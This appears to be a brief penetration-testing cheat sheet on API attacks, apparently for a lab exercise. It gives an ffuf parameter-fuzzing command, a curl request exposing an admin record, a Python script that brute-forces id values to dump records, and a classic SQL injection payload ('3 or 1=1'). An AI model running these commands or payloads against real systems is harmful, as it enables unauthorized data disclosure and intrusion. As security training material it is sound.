API Attacks
Information Disclosure (with a twist of SQLi)
Fuzzing parameters
Wordlist - burp-parameter-names.txt
ffuf -w "burp-parameter-names.txt" -u 'https://SERVER_IP:PORT/?FUZZ=test_value'Check response by specifying the fuzzed parameter (id)
curl http://SERVER_IP:PORT/?id=1
[{"id":"1","username":"admin","position":"1"}]Retrieve all the parameters values
import requests, sys
def brute():
try:
value = range(10000)
for val in value:
url = sys.argv[1]
r = requests.get(url + '/?id='+str(val))
if "position" in r.text:
print("Number found!", val)
print(r.text)
except IndexError:
print("Enter a URL E.g.: http://<TARGET IP>:3003/")
brute()Test for SQLi
Try classic payloads like 3 or 1=1
Last updated